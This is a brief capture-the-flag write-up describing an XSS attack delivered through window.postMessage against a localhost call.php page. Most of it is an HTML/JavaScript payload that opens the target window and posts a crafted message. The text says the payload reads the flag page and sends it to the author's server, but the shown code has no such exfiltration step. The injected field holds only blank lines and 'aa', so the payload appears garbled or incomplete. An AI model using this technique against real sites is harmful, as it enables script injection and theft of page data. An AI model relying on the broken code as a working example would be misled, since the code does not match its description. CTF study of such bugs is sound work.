This challenge was completed by triggering XSS via the window.postMessage API. The payload can be seen below, which reads the content of the page containing the flag and sends it to my server.

```
<html>
<body>
<script>
var call_window;
call_window = window.open("http://localhost/call.php");
console.log(call_window);
setTimeout(function(){
call_window.postMessage({
type: "audio",
details: {
sender_username: "testuser2",
sender_team_name: "test",
receiver_username:"


aa",
receiver_team_name: 'aa'
}
}, "*");
}, 1000);

</script>
</body>
</html>
```